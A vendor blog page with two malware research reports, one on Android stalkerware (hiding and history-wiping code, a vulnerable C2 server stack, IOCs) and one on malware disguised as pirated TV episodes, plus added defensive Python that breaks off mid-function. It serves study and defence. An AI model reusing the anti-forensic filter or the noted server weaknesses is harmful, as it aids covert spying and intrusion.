Beware of stalkerware

Spyware might sound like a concept from a Hollywood movie, yet commercial versions of such programs – known in the cybersecurity industry as ‘stalkerware’ – are a daily reality for many people. For the price of just a few dollars, consumer spyware programs allow users to spy on their current or former partners, and even strangers. This can be done by simply installing an app on the targeted victim’s smartphone or tablet. Once this has happened, the stalker is granted access to a range of personal data: from the victim’s location and SMS, to social media messages and live feeds from their device camera or microphone.

From observing stalkerware program functionality, it can be seen that there are very few differences between commercial spyware (detected and defined by most security software as ‘not-a-virus’) and classic spying malware. For example, a consumer surveillance program works like this:

  • The command and control server (C2) is provided by the service owners
  • It is easier to buy and deploy than spying malware. There is no need to use shady hacking forums or have programming skills – in almost all cases it requires only a simple manual installation

Stalkerware programs have been exposed and publicly criticized multiple times, yet in most countries their status remains vague, while some brands market their programs as child-tracking software. However, these programs should not be confused with legal parental control software and ‘find my phone’ apps, despite an overlap in functionality. Firstly, they are distributed through dedicated landing pages – a direct violation of Google Play safety recommendations. Secondly, these apps have functionality that allows them to invade the privacy of an individual without their consent or knowledge: the application icon can be hidden from the applications menu while the app continues to run in the background, and some functions of the app fulfil surveillance tasks (such as recording the victim’s voice). Some even delete traces of their presence from the phone, along with any installed security solutions, once the attacker manually grants the application root access.

We detect such programs as ‘not-a-virus:Monitor’ and have been keeping a close eye on them. Two years ago, we published our first overview and continued to monitor such threats. We have now decided to conduct further research to check how stalkerware is being used and determine the most prominent features of the latest consumer surveillance programs.

We examined applications for mobile platforms, with a particular focus on Android, because it is the most popular OS that stalkerware is implemented on. For attackers to perform extended exfiltration activities on iOS devices, the devices need to be jailbroken first.

All in all, 2018 saw 58,487 users who had a stalkerware application installed on their phones or tablets. That is a moderate number compared to other types of threats. For example, during the same period, the number of users who encountered ransomware was 187,321. However, it should be noted that when it comes to malware, our figures show how many people we were able to protect from infection. But when we look at stalkerware, the situation is a bit different.

Out of the 58,487 users on whose devices we detected stalkerware apps, approximately 35,000 had these apps installed before they installed Kaspersky Lab products and the first security scan was performed. This could mean they were unaware of the presence of such software on their device.

In total, in 2018 we identified 26,619 unique samples of stalkerware programs.

The following statistics reveal the most detected stalkerware applications based on the number of unique users of Kaspersky Lab for Android mobile products:

The most often detected stalkerware apps by the number of targeted users, 2018

Apart from these applications, we have also chosen a number of other programs that we’ve been monitoring manually for a while.

After having them analyzed, we found some important features that, when put together, paint a clear picture of how stalkerware is now used, and we have listed six reasons to stay as far away from these applications as possible.

Their distribution methods pose a threat

Due to their aggressive nature, stalkerware programs can’t be found or listed in the App Store or on Google Play. In most cases, however, they can be found after a quick internet search and downloaded from dedicated landing pages. Of course, these programs urge users to enable the installation of applications hosted outside Google Play, which can often put devices at risk: enabling applications that cannot be found on Google Play makes an Android device vulnerable to malware and goes against Google’s security policies.

The programs are advertised through online banners. Cybercriminals also use ‘Black Hat SEO’ techniques to ensure the website supporting the program moves up the search engine ranking and appears at the top of search results pages.

The main ‘infection’ vector of stalkerware applications is manual installation, since the attacker needs to register a device after installation by entering license credentials. After this quick configuration process, the stalkerware program is ready to spy on the attacker’s target, and its presence is hidden on the device. This is the case with Mobile Tracker Free:

Moreover, some programs apply additional measures to prevent possible detection by the victim. For example, by masking itself as a system service in the installed applications list:

This masking feature is common behavior among typical Android threats. In some more secretive cases, stalkerware applications cover up all their tracks: upon installation, such an application removes the downloaded installer file and clears the browser history of the specific web pages related to the program’s distribution. These code chunks illustrate how it works in the FreeAndroidSpy stalkerware:

Cleaning up the ‘downloads’ directory

Removing the browser history

The full SQL filter used to remove the browser history entries:

url like \’%freeandroidspy.com%\’ or url like \’%spysetup.com%\’ or url like \’%spysetup.co%\’ or url like \’%ytubecache.com%\’ or url like \’%my.spysetup.com%\’

It filters history entries by the specific web pages used to download the FreeAndroidSpy stalkerware installer.
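As an added example (not code from FreeAndroidSpy and not a Kaspersky tool), the following Python helper turns a cleanup filter like the one quoted above into a list of distribution domains that an analyst can block or alert on, and emulates SQLite's case-insensitive `LIKE '%x%'` match to show which history rows the stalkerware would erase. The filter string is the one quoted above; the sample history URLs in the self-test are constructed.

```python
import re

# The history-cleanup filter quoted above, kept with the backslash-escaped
# quotes exactly as it appears in the decompiled Java string.
FREEANDROIDSPY_FILTER = (
    r"url like \'%freeandroidspy.com%\' or url like \'%spysetup.com%\' or "
    r"url like \'%spysetup.co%\' or url like \'%ytubecache.com%\' or "
    r"url like \'%my.spysetup.com%\'"
)

# One "url like '%<substring>%'" term, with or without the Java quote escape.
LIKE_TERM = re.compile(r"url\s+like\s+\\?'%([^%']+)%\\?'", re.IGNORECASE)


def distribution_domains(sql_filter):
    """Extract, in order and without duplicates, the substrings the cleanup
    routine deletes from the browser history. For stalkerware these are its
    own download and landing domains, i.e. ready-made network indicators."""
    seen = []
    for term in LIKE_TERM.findall(sql_filter):
        if term not in seen:
            seen.append(term)
    return seen


def would_be_erased(url, sql_filter):
    """Emulate SQLite's case-insensitive LIKE '%x%' for one history row."""
    url_l = url.lower()
    return any(term.lower() in url_l for term in distribution_domains(sql_filter))


def split_history(history, sql_filter):
    """Split history rows into (erased, kept), the way the stalkerware's
    DELETE ... WHERE <filter> would leave the browser history table."""
    erased = [u for u in history if would_be_erased(u, sql_filter)]
    kept = [u for u in history if not would_be_erased(u, sql_filter)]
    return erased, kept


if __name__ == "__main__":
    # Constructed history rows, not taken from any real device.
    sample_history = [
        "https://my.spysetup.com/app/download",
        "https://www.example.org/news",
        "http://FreeAndroidSpy.com/setup",
    ]
    print(distribution_domains(FREEANDROIDSPY_FILTER))
    print(split_history(sample_history, FREEANDROIDSPY_FILTER))
```

Because the filter is matched as a substring, every host under those domains (for example `my.spysetup.com`) is covered, which is also why a blocklist built from `distribution_domains` should be applied as a suffix or substring match rather than an exact one.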

You never know which one is actually on a device

Spyware has established itself as a popular product, and some have become part of different distribution schemes. They might differ by name or the website they can be found on, but they are actually the same product. This is an important point, related to many stalkerware products. There are special programs that allow third-parties to buy franchises and to distribute the product under their own brands, like this one – iSpyoo:

Screenshot from the iSpyoo official site

As a result, we’ve detected a number of iSpyoo samples that are technically the same. Here are two examples of ones we’ve examined: Copy9 (8ac6209894fff56cf2a83f56408e177d) and TheTruthSpy (a20911f85741ed0f96cb4b075b7a32c1).

Both were signed with certificates that have the same issuer/subject:

But further analysis shows the only – but big – difference: they have different C2 server addresses in the same code.

So technically this is the same stalkerware application, but packaged as different products with their own websites, names, marketing strategies and C2 servers.

Both versions of this application have the same user interface:

Obviously, such products have the same server-side part, and this is crucial. If a cyberattacker discovers an exploitable vulnerability in the C2 server of one product, all the other products will be at risk of exposing data as well.

Rather predictably, both TheTruthSpy and Copy9 were hacked in 2018.

Photographs, SMS, WhatsApp chats, call recordings, contacts, and the browser history of thousands of stalkerware victims were leaked to third-parties.

Trusting these applications with your partner’s data puts it at risk of exposure

This brings us on to another important point. As is the case with many spyware programs, they don’t just invade an individual’s privacy, they also store an overwhelming amount of sensitive personal data (in some cases, all of a person’s digitalized personal data) with poor security and a high risk of exposure.

As mentioned above, such programs came to our attention a while ago, and we conducted major research on them in 2017. Back then, we discovered that many had significant security flaws. In particular, we found a critical directory listing vulnerability in SpyMaster Pro:

An incorrect C2 server configuration gave anyone full access to the victims’ stolen data. Although this vulnerability is now fixed, it comes as no surprise that hackers became very interested in this kind of service.

In fact, the past 12 months have seen a lot of publicly known stalkerware product data breaches. For example, the MSpy application breach leaked millions of sensitive records, and not for the first time.

Other widely discussed application data breach cases include the hacking of FlexiSpy, one of the most expensive ($68 per month) programs on the market, and Mobile Spy by Retina-X, which was first breached in 2017 and then again in 2018, with the data shared with Motherboard magazine. This contained intercepted text messages indicating that the program was being used to spy non-consensually on some victims.

Note on Mobile Spy official site

Overall, we found that five out of the 10 most popular stalkerware program families had poor security or had leaked a tremendous amount of personal data due to breaches.

Their infrastructure is questionable to say the least

These breaches were not accidental; they stem from security issues in the stalkerware infrastructure. Unfortunately, according to our statistics, a lot of C2 servers contain critical security vulnerabilities that attackers can exploit to expose users’ sensitive information.

Besides the critical directory listing vulnerability that we described in a previous publication, we also examined Talklog – a Russian-speaking product.

It’s easy to determine the C2 server address since it is hardcoded into the sample code:

The following directory is forbidden for listing:

But with simple crawling we could find a phpMyAdmin service here – /myadmin:

Its documentation path is available as well, so we could determine the current version of the service:

This is a very outdated version; the current version of phpMyAdmin at the time of our research was 4.8.5.

A simple search in the Offensive Security Exploit Database reveals multiple exploits that could be used to harm or even take control of the C2 server:

Another service that we easily found is SquirrelMail, here – /webmail:

As shown on the login form, it’s version 1.4.23, which, according to the exploit database, seems vulnerable to the Remote Code Execution exploit as well:

This top level analysis, without serious penetration testing procedures, already reveals major security issues within the stalkerware app server that could be exploited by potential attackers and expose the sensitive information of all victims.

You never really know where they come from

Another trait of many stalkerware services is their unknown origins. In the majority of cases, these are far from transparent, to say the least. We don’t know where they come from, who is behind them, who develops these programs and which legislation should be applied to them.

Let’s take MobileTool as a prime example of this. Even though there is a mention of “ltd. OEME-R Technology, Israel” in its company details on its official site, there are a couple of clues that point to the original roots of the service.

Company details

  • The official site is available only in Russian
  • The EULA from the official site contains a mention of “Minsk” – the capital of Belarus
  • Contact information contains a telephone number that is easily attributed to the Velcom operator – a Belarus telephone provider

That number is also linked to a person who tried to sell a house located in Brest on a Belarus property website:

Fun fact: according to the webpage of this application on 4pda.ru, it’s unavailable in Belarus, even though that is the suspected country of origin for the application.

Warning! The service is not available in Belarus! Do not try to avoid this restriction. You will just lose your money.

So, it looks like the developers wanted to avoid some local law with that restriction.

Another example of a program with a suspicious origin is the Spy Phone App. It is registered in Pervolia, Larnaca, Cyprus, an area that has offshore policies and flexible legislation for registered businesses, as well as secrecy laws that protect people’s identities, lenient financial reporting standards and very low taxes.

Their self-protection mechanisms are too aggressive

Even though stalkerware is detected as not-a-virus, these applications have rather aggressive self-protection policies. During our research we observed different self-protection/hiding techniques (some of which have been mentioned above). One of the most notable belongs to the Reptilicus stalkerware application. When it is first launched, it scans all the installed applications and matches them with its hardcoded list:

As we can see, this list contains dozens of names of mobile antivirus products that could detect and remove stalkerware products, since they would be registered as harmful applications. For example, according to VirusTotal, this sample of Reptilicus is detected by 20/59 of the vendors represented on the service:

If this stalkerware finds an installed antivirus product from this list, a special message will be shown to the user with a request to delete the antivirus product or to whitelist the Reptilicus application:

Conflict applications found, remove it or put application to exclusion list. If you do not do this, our application may work intermittently. Found conflicting applications:

Their installation manuals make you not only a stalker but also a cyberfraudster

Another notable trait of almost all stalkerware products is an installation manual that violates many security policies. The Mobile Tracker Free official website has this kind of installation guide and it includes some alarming recommendations.

According to this guide, you must:

  • Enable installations from unknown sources on your phone if you haven’t already done so. “Check the box ‘Unknown sources’. Accept the warning by clicking ‘OK’.”
  • Allow the installation of unknown applications to a mobile browser.
  • Disable Google Play Protect. “Google has added a security system for apps that are not downloaded from Google Play called ‘Play Protect’. It is possible that the Mobile Tracker Free application is detected as potentially dangerous. To prevent the app from being uninstalled, you must disable Google Play Protect and disable notifications related to Google Play Protect.”

This is probably the most horrible mobile security guide that could be presented to a user, as all these steps put a device at risk of being infected by any malware or not-a-virus threats in the future. Moreover, and this is probably the most crucial point here, this guide does not include steps to revert the settings to their original state after installation, so the device on which this software is installed will remain vulnerable.

Their industry has gone way too far

What surprised us most in this research is that, apart from the programs being so easy to find online, they are extremely bold in their promotion and distribution. Forget Darkweb forums or underground markets, developers of these applications have built their own economic environment. They provide different offers for different needs, with tariffs ranging from half a dollar per day to $68/month. Some of them even have their own Twitter account and blogs that are being constantly updated and are apparently managed by dedicated social media managers. The most outrageous programs continue to exist, including the infamous FlexiSpy, described by many as a data-breach catastrophe. In fact, when we researched it, we found a well-kept company blog that was presenting software updates and new features that could be accessed by anyone; along with an active Twitter account.

Moreover, some stalkerware companies are so open about their practices that they offer to deliver a phone with the program pre-installed to the buyer – specifically for those who lack the technical skills to install the application manually. This also gives the people who run the program an opportunity to collect information on how skilled their customers are. The Reptilicus app is one of them: according to its official website, this company offers not only a stalkerware application but an already backdoored phone.

According to statistics from 100% of our users, only 60% can independently configure the device to work properly. If you have any difficulties, or you just have no time to do this, we will do everything ourselves and send you a phone with the installed program.

As the whole stalkerware industry is growing year by year, it has spawned internal competition in an unregulated free-market economy. For example, this is the blogpost about iSpyoo stalkerware published by its competitor – Mspy:


The companies also have a whole mechanism to create fake reviews. This has been done by the Hoverwatch stalkerware service:


There is no need to prove the negative effects that commercial spyware brings, as its initial concept is completely unethical. However, there are many layers of other threats that these programs bring to a user who installs them. They breach the policies of mobile application stores, breach security and make the data of stalked victims vulnerable to hacker exploitation. Later, that data can be used in all kinds of malicious activities – from financial extortion to identity theft. We can also safely say that there are people who benefit from this and can access this data, while their own identities, origins and location remain unknown.

Despite all the findings listed above, most cybersecurity vendors still don’t detect commercial spyware as a threat due to vague legal positioning on commercial surveillance.

However, starting from April 3, 2019, Kaspersky Lab will be notifying its Android users of such programs’ existence on their devices, with a special feature implemented in our Android security app.

All mentioned stalkerware products

| Name | Sample MD5 | Official site | iOS version |
|---|---|---|---|
| MobileTool | 7229d6c4ddb571fb59c1402636c962c2 | hxxps://mtoolapp[.]net/, hxxps://mobiletool[.]ru/ | – |
| iSpyoo | 8ac6209894fff56cf2a83f56408e177d (copy9), a20911f85741ed0f96cb4b075b7a32c1 (thetruthspy) | hxxps://ispyoo[.]com/, hxxp://thetruthspy[.]com/ | + |
| Talklog | 5b20dace9cc15afc9a79332e4377adc2 | hxxps://talklog[.]net/ | – |
| Spy Phone App | bf090ca25d27d2e11dfe64cf0f7b645a | hxxps://www.spy-phone-app[.]com/, hxxps://easyphonetrack[.]com/ | + |
| Reptilicus | 9be7585e88c3697d1689fdd1456c2a52 | hxxps://reptilicus[.]net/ | + |
| Mobile Tracker Free | 847c5f78de89ed4850e705a97a323a1a | hxxps://mobile-tracker-free[.]com/ | – |
| Hoverwatch | 9559138aee33650d10f0810fdeb44b3e | hxxps://www.hoverspyapp[.]com/ | – |
| Mobile Spy | 62bc31db17343049ba70d0f8c9be0ba8 | hxxp://www.mobile-spy[.]com/ | – |
| FlexiSpy | 8514c499f825ca5682a548081c2e6c61 | hxxp://www.flexispyapp[.]com | + |
| MSpy | dee7466c8b58b2687bb003226ac96e6b | hxxps://www.mspy[.]com/ | + |
| FreeAndroidSpy | 1cb261cd82677124e6adac17a59707aa | hxxp://freeandroidspy[.]com/ | – |
April 1, 2019

Game of Threats


While the way we consume TV content is rapidly changing, the content itself remains in high demand, and users resort to any means available to get at it – including illegal and non-ethical ones like the use of pirated stuff. The world is embracing the idea of paying for entertainment more and more with the development of paid subscription networks like Netflix or Apple Music. Yet many countries are still fighting the battle against illegally distributed content. In December 2018, Australia’s Federal Court issued an injunction requiring local internet providers to block 181 pirate domains linked to 78 websites full of files infringing copyright regulations. At the beginning of 2019, Brazil’s Ministry of Justice brought on board the Federal Police of Brazil (Polícia Federal) to launch an anti-piracy operation targeting the illegal distribution of music, movies and TV shows. These are just two of the many initiatives introduced both by governments and the private sector all over the world to combat the problem.

However, despite these measures, copyright-infringing content is still readily available. According to the latest Annual Piracy Report by Muso – a global technology company providing anti-piracy, market analytics and audience connection solutions – the number of pirated content consumers is growing. The company registered more than 300 billion visits to pirate websites in 2017 alone, a 1.6% increase from 2016, and the trend is international: the US supplied the greatest number of pirate website visitors with 27.9 billion visits per year, followed by Russia, 20.6 billion (a 46% increase from 2016), and India, whose residents visited pirate websites 17 billion times. A major share of pirated content still comes from downloadable files: a 2019 WebKontrol report claims that torrent websites are still leading in Russia in terms of volume of pirated content, followed by file-hosting and streaming services. Moreover, the share of links to illegal content posted on torrent websites grew 14% from 2018 (38% from 24%), overtaking streaming websites.

Being a lucrative source of content, torrents also prove to be a popular way of distributing malicious code, and there are many studies on how cybercriminals exploit that opportunity. According to the results of one such study published in 2015, bootlegged content represents 35% of files shared via BitTorrent, with more than 99% of the analyzed counterfeit files linked to either malware or scam websites. The recent findings by Kaspersky Lab and independent researchers have confirmed the continuation of this trend.

But what kind of content is being targeted? Originally, torrent trackers were the ‘go-to’ places for those seeking pirated versions of games and other software, as well as recent Hollywood blockbusters. Yet in recent years TV shows have become an extremely popular type of content among viewers all around the world – sometimes even more popular than Hollywood movies. According to the Muso report, TV content is clearly of interest to one third of all users consuming copyright-infringing content: TV shows remain the most popular product among users with 106.9 billion visits last year, followed by music (73.9 billion) and films (53.2 billion).

Such popularity has not escaped the eye of cybercriminals, either. To find out exactly how they capitalize on the rise in illegal downloads of TV content, we have researched the landscape of malware threats disguised as new episodes of popular TV shows distributed through torrent websites. Our goal was to see which TV series were the most popular with the malware pushers and to take a closer look at what kind of threats are distributed that way.

Methodology and key findings

To make sure the TV series we focused on were high in demand and sufficiently relevant, we made a list of the most popular TV shows in 2018 using various public sources like IMDB, Rotten Tomatoes and other online ratings sources, plus the most pirated TV shows, also suggesting how popular a particular show may be. We listed a total of 45 titles, but as some of the more popular ones appeared in several different rankings at the same time, we made a few revisions and came up with a final list of 31 TV shows (according to various public ratings like IMDB, Rotten Tomatoes, TorrentFreak, etc., in an alphabetic order).

  1. Altered Carbon
  2. American Horror Story
  3. Arrow
  4. Better Call Saul
  5. Daredevil
  6. DC’s Legends of Tomorrow
  7. Doctor Who
  8. Game of Thrones
  9. Grey’s Anatomy
  10. Homeland
  11. House of Cards
  12. Killing Eve
  13. Legends of Tomorrow
  14. Modern Family
  15. Roseanne
  16. Sharp Objects
  17. Stranger Things
  18. Suits
  19. Supernatural
  20. The Big Bang Theory
  21. The Flash
  22. The Good Doctor
  23. The Good Place
  24. The Handmaid’s Tale
  25. The Haunting of Hill House
  26. The Walking Dead
  27. The X-files
  28. This Is Us
  29. Vikings
  30. Westworld
  31. Young Sheldon

We then ran each title against our threat database. Using aggregated threat statistics from the Kaspersky Security Network (KSN) – the infrastructure dedicated to processing cybersecurity-related data streams from millions of volunteers around the world – we checked whether the users who had agreed to share threat statistics with KSN had ever encountered malware when dealing with the corresponding TV show titles.

Next, we identified the episodes of the most popular TV shows used to disguise malware to find out whether there was any correlation between the number and order of episodes in any given season and the malware pushers’ interest in them.

In addition, we estimated how effective each disguise was, how successful a bait each TV show was, and the overall potential of the setup as a source of spreading malware. To do that, we divided the total number of unique attacked users by the number of malicious files, and did the same for each TV series. This gave us the average number of users reached by at least one TV show-themed malicious file which, to some extent, allowed us to identify the TV show that worked best as a decoy.

Finally, we looked at what kind of threats are more likely to hit users under the cover of popular series.

These are our key findings:

  • The total number of users who encountered TV-show-related malware in 2018 is 126,340 globally, one-third less than in 2017. The number of attacks by such malware has seen a decrease of 22% to 451,636 registered attempts
  • The top three TV shows most often used for bait and used to attack the greatest number of users: Game of Thrones, The Walking Dead and Arrow
  • Game of Thrones accounted for 17% of all the infected pirated content in 2018, with 20,934 users attacked, despite being the only TV show in the list that didn’t have new episodes released in 2018
  • The first and the last episodes of each Game of Thrones season we analyzed turned out the most dangerous, accounting for the greatest number of malicious files in Kaspersky Lab’s collection and affecting the most users
  • ‘Winter Is Coming’ – the very first episode of the show – was the one most actively used by cybercriminals
  • Within two years we detected 33 types and 505 different families of threats hiding behind the Game of Thrones title
  • On average, 2.23 users were attacked seven times per malware file disguised as a TV show
  • American Horror Story proved to be the most effective malware cover – each malicious file hidden behind the title has reached an average of three users
  • Not-a-virus:Downloader and Not-a-virus:AdWare turned out to be two of the most popular threats delivered via TV show content, the most popular one being the dangerous malware type called Trojan

General Overview: malware is coming

The analysis of malicious payloads guised as popular TV series names, and a comparison between the results for years 2017 and 2018, has demonstrated a decrease in the numbers of such malware files, attacks and affected users.

A total of 126,340 users were attacked – one third less than in 2017 (188,769). The decline is smaller than that seen elsewhere. For example, a recent report showed that the number of users affected by malware delivered via popular content, including porn, fell by 45% in 2018.

Like the user count, the malware count also declined: in 2017, a year rich in malware, we added 82,091 samples to our database, yet in 2018 that number dropped 30% to 57,133.

Torrent website offering all sorts of pirated content

The total number of attacks detected by our security solutions also dropped, but only by 22%, down to 451,636.

Such a decline might be connected to some of this year’s events potentially affecting the number of torrent file downloads. First, in 2018, Google downranked more than 65,000 torrent websites – major distributors of pirated TV shows – leaving a great many users unable to find them when looking for TV series downloads. Active action against torrent websites does make a difference, with more and more of them finding themselves blocked or troubled. For example, two major torrent trackers (Pirate Bay and Demonoid) have of late suffered functionality collapses, and one of the world’s longest-standing ones, Leechers Paradise, was shut down for good.

In response, websites streaming pirated copies of movies and TV series are becoming more and more popular, draining the audience from the torrents.

Yet torrents are still running high and – based on our statistics – attempts to harm users are still registered. To measure how effective such malware is, we compared the overall number of unique users attacked with the number of malicious files detected. By dividing the number of users by the number of files we found that every TV show malware file has infected an average of 2.23 users in 2018.

Additionally, we compared the list of the most popular torrents in 2018 with the list of the most infected TV series.

  The most popular TV show torrents    Top TV shows used to cover up malware
  The Walking Dead                     Game of Thrones
  The Flash                            The Walking Dead
  The Big Bang Theory                  Arrow
  Vikings                              Suits
  Titans                               Vikings
  Arrow                                The Big Bang Theory
  Supernatural                         Supernatural
  Westworld                            Grey’s Anatomy
  DC’s Legends of Tomorrow             This Is Us
  Suits                                The Good Doctor

The most popular torrents of 2018 as reported by TorrentFreak versus the most popular malware-decoy TV series titles

As seen from the table above, six out of 10 TV series are featured on both lists, which we would expect: the more popular a TV show is, the more likely it is to be used by cybercriminals. At the same time, several shows that had been heavily promoted by their makers and were considered to be at the top in terms of popularity – Westworld, DC’s Legends of Tomorrow and a few more – didn’t make it to the top of disguised infections. This, in a way, may reflect the real popularity of these titles.

The M-files: most often infected series

Of course, some TV series are more popular among cybercriminals than others – and threat statistics prove that. To understand which of them attract threat actors the most, we reviewed the number of malware files hidden behind each popular TV show title, the number of times they have attacked users and the number of users affected by such attacks. The leaders turned out to be Game of Thrones, The Walking Dead, Arrow, Suits, Vikings, The Big Bang Theory, Supernatural, Grey’s Anatomy, This Is Us, and The Good Doctor. The latter has replaced House of Cards, which rounded out the top 10 in 2017.

‘Malicious files’ represents the number of unique samples of malware encountered by our users; ‘Attacks’ stands for the number of times our security solutions reported detects, and ‘Users attacked’ means users attacked by TV-series-related malware at least once.

Top 10 TV shows used as a disguise for malware in 2018

Of all the TV series analysed, Game of Thrones had the greatest number of users attacked by malware of the same name – 20,934. It tried to infect users 129,819 times, and the total number of Game of Thrones-themed malware files in our threat collection is 9,986. This makes the show an unmatched leader in popularity not just among users but also among cybercriminals looking for the most effective way to distribute malware.

A year before, in 2017, the wave of Fire and Ice-themed malware was even bigger with almost twice as many users affected and malware files: 42,330 and 19,180, respectively. The number of attacks in 2017 exceeds the 2018 figure by 22% with 167,691 detects.

Top 10 malware disguised as a TV show by the share of users attacked in 2017

Top 10 malware disguised as a TV show by the share of users attacked in 2018

The second place, both in 2017 and 2018, was occupied by The Walking Dead, with 18,794 users attacked, and the third by Arrow (12,163 users). The gap of 380 between the number of users attacked by malware disguised as The Walking Dead versus Game of Thrones seems insignificant. However, we need to remember that Game of Thrones is the only TV series in the top 10 that was not even broadcast during 2018 – the period for which the statistics were gathered.

For comparison, we looked at similar rankings in 2017 when all three TV shows were releasing episodes live. As seen from the graph below, the difference between Game of Thrones and The Walking Dead was more pronounced, with the number of users attacked by Game of Thrones malware exceeding The Walking Dead and Arrow figures by 33% and 50%, respectively.

Top three TV shows used as a disguise for online threats

We also took a closer look at sample episodes from the two latest seasons (six and seven) of Game of Thrones and the original first season. The results revealed that the number of infected files spotted by our protection technologies differed significantly from episode to episode. The common theme we were able to spot was that the first and last episodes of each season were used as a disguise for malware. The titles of the opening and closing episodes of each season were also used the most actively to hide malware compared to other episodes.

Game of Thrones episodes: number of infected files and unique users attacked in seasons 1, 6 and 7

Due to the huge time and resource requirements for such an analysis, we did not analyze any other series. But based on what we have on these three different seasons of GoT, it is a safe bet that other series would be exploited in much the same way.

But what we can’t assume is that, while the malware disguise reached a significant number of users, it is the most effective method of distribution. As we mentioned earlier, malware files disguised to appear as TV show episodes (no matter which) have hit an average of 2.23 users in 2018. Out of the top 10 TV shows used for cyberattacks, Game of Thrones was only seventh in terms of the proportion of malicious files to the number of affected users. Moreover, it proved to be less effective as an average bait, there being one malicious file disguised as Game of Thrones per every 2.1 users attacked.

We looked at the files to users ratio when analyzing each TV series from the top 10. The files named after The Walking Dead proved to be the most successful, with 2.69 users attacked on average. Second place went to Grey’s Anatomy with 2.65, and third to Supernatural with 2.34.

Later we also checked the remaining TV shows that were analyzed by us but did not make it to the top 10.

Surprisingly, it turned out that the most successful and productive files were hiding behind TV shows that did not make it to the top 10. Each malicious file of the American Horror Story blood line has reached an average of three users in 2018, lifting itself from the fourth place in the 2017 ratings. Back then the top three most effective malware files pretending to be TV shows looked different. Modern Family occupied the third position with 2.95, and Grey’s Anatomy was second with three. Each file of the Big Bang Theory line was able to reach 3.15 users and was topping the list, yet in 2018 it dramatically fell to the eighth position.

Average number of users dealing with TV series-disguised malware files in 2017

Average number of users dealing with TV series-disguised malware files in 2018

Threat Anatomy: attack vectors and types of threats

To investigate what type of TV show-disguised threats are more likely to infect the users’ computers, we extracted infected samples of the most popular TV shows in 2017 and 2018 and counted the different types and families of threats.

We detected a total of 33 threat types and 505 different families hiding behind the Game of Thrones TV show title. The top three most popular threat categories among these were: Trojan, accounting for almost one third of all threats; not-a-virus:Downloader with 21%; and not-a-virus:AdWare with 28%. The ‘not-a-virus’ type of threats are usually not classified as malware, yet such programs may interfere with users’ sessions causing unwanted actions to be performed. AdWare, for instance, can show unsolicited ads, alter search results and collect user data to deliver targeted, contextual advertising.

Top 10 most popular malware types by the share of unique users attacked in 2017-2018

Top 10 most popular malware families by the share of unique users attacked in 2017-2018

As we looked at the statistics of threat types and threat families, we realized that the top-three most popular families represented the three most popular types of threats.

The most widespread threat: Trojans

According to the statistics, the most common type of threat was the Trojan, and in 17% of all cases users of pirated TV shows had to deal with worms of the Trojan.WinLNK.Agent family. A Trojan is a dangerous type of malware able to cause much harm, from information theft to gaining control of the infected system. The Trojan family pretending to be Game of Thrones that most actively attacked users usually looks like a shortcut to the file and is distributed quite differently from the other threats described here – usually through emails or questionable websites.

Example of a Trojan disguised as a TV show downloaded to a PC

The common scenario is this: the user downloads a torrent file or receives an archive with a shortcut by email. At first glance the package contains a copy of the long-awaited episode.

Yet, apart from the shortcut, the archive will also contain a hidden folder with the ‘system’ attribute on, making it invisible even if Windows Explorer is configured to display hidden files.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC. Source: Kaspersky Lab

By clicking on the shortcut in hope to watch the video, the user will launch the AutoIt script sitting in the hidden folder along with its interpreter and several other .lnk files.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC. Source: Kaspersky Lab

Example of behavior of a Trojan disguised as a TV show downloaded to a PC. Source: Kaspersky Lab

The AutoIt script is a worm that spreads through removable disks and runs a backdoor, which is then added to autorun (writing paths to the .lnk files from the hidden folder) and used to accomplish the following actions:

  1. Display a specified message
  2. Execute commands in cmd.exe
  3. Download files to %Temp% and launch them
  4. Shutdown/restart computer
  5. Go to a specified URL
  6. Auto-click various webpage items
  7. Terminate, restart, update itself
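
A defender-side way to triage such a download, as an added example that is not code from the Kaspersky report: it inspects an archive for the traits of the scenario above (a .lnk shortcut offered as the episode, and a folder carrying the DOS hidden and system attributes that holds the interpreter and script), and also flags media-looking names that end in an executable extension, the .avi.exe trick the adware section below discusses. The archive is assumed to be a ZIP (the report does not name the format), and the sample archives are constructed.

```python
"""Added example, not code from the Kaspersky report: triage of a downloaded
archive for the traits described above. Assumption: the archive is a ZIP;
all sample archives and file names below are constructed placeholders."""
import io
import zipfile

# MS-DOS attribute bits are kept in the low byte of ZipInfo.external_attr
DOS_HIDDEN = 0x02
DOS_SYSTEM = 0x04
DOS_DIRECTORY = 0x10

MEDIA_EXTS = (".avi", ".mkv", ".mp4", ".mov", ".wmv", ".srt")
EXEC_EXTS = (".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".au3")


def is_double_extension(name: str) -> bool:
    """True for 'episode.avi.exe' style names: a media extension right before an executable one."""
    name = name.lower()
    if not name.endswith(EXEC_EXTS):
        return False
    stem = name.rsplit(".", 1)[0]
    return stem.endswith(MEDIA_EXTS)


def triage_archive(data: bytes) -> dict:
    """Inspect ZIP bytes and group suspicious entries by indicator."""
    findings = {
        "shortcuts": [],           # .lnk files offered as the 'video'
        "hidden_system_dirs": [],  # directories flagged hidden + system
        "in_hidden_dirs": [],      # files living inside those directories
        "double_extensions": [],   # media name ending in an executable extension
        "executables": [],         # any other executable or script content
    }
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        # First pass: directories whose DOS attributes are hidden + system
        for info in infos:
            attrs = info.external_attr & 0xFF
            if info.is_dir() and attrs & DOS_HIDDEN and attrs & DOS_SYSTEM:
                findings["hidden_system_dirs"].append(info.filename)
        # Second pass: classify the files
        for info in infos:
            if info.is_dir():
                continue
            name = info.filename
            low = name.lower()
            if low.endswith(".lnk"):
                findings["shortcuts"].append(name)
            if is_double_extension(low):
                findings["double_extensions"].append(name)
            elif low.endswith(EXEC_EXTS):
                findings["executables"].append(name)
            if any(name.startswith(d) for d in findings["hidden_system_dirs"]):
                findings["in_hidden_dirs"].append(name)
    return findings


def assess(findings: dict) -> str:
    """Map findings to a risk level for the 'is this really an episode?' question."""
    if findings["double_extensions"] or (findings["shortcuts"] and findings["hidden_system_dirs"]):
        return "high"     # matches the shortcut + hidden folder or .avi.exe decoy patterns
    if findings["shortcuts"] or findings["executables"]:
        return "medium"   # a video release should not need shortcuts or executables
    return "low"


def build_decoy_archive() -> bytes:
    """Constructed sample mimicking the shortcut + hidden folder layout (placeholder bytes only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
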